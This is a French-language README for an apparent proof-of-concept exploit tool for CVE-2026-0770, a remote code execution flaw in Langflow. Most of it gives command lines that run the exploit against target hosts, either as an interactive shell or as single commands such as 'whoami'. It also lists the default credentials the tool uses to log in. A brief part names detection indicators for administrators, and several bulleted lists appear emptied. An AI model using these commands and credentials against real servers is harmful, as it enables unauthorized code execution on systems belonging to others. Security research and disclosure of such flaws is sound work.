
Langflow Preuve de concept d'exécution de code à distance (RCE)
Vulnérabilité d'exécution de code à distance dans Langflow
Cette vulnérabilité affecte :
Langflow
CVE-2026-0770 est une vulnérabilité d'exécution de code à distance (RCE) dans le point de terminaison :
/api/v1/validate/code
Lorsque AUTO_LOGIN=true et que les identifiants par défaut sont activés, les attaquants peuvent :
Le problème provient d'une évaluation non sécurisée de code Python lors de la validation.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Assurez-vous que Python 3.8+ est installé.
Installez les dépendances :
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
Lancez l'exécution de commandes à distance interactive :
python3 CVE-2026-0770.py -t http://target:7860
Exemple :
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
Exemple :
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
Affiche une sortie de débogage détaillée.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
Si aucun jeton n'est fourni, le script tente une connexion automatique en utilisant :
username: langflow
password: langflow
En cas de succès, il récupère un access_token et poursuit.
Les administrateurs doivent :
AUTO_LOGIN/api/v1/validate/codeSurveillez :
Les requêtes POST suspectes vers /api/v1/validate/code
Le code contenant :
__import__subprocessthrow(Exception(Les tentatives de connexion répétées avec les identifiants par défaut
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
Chercheur en sécurité | Développeur d'exploits | Rédacteur de PoC
Distribué sous la licence MIT. Voir la licence complète ici :
Ce projet est destiné à :
Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale.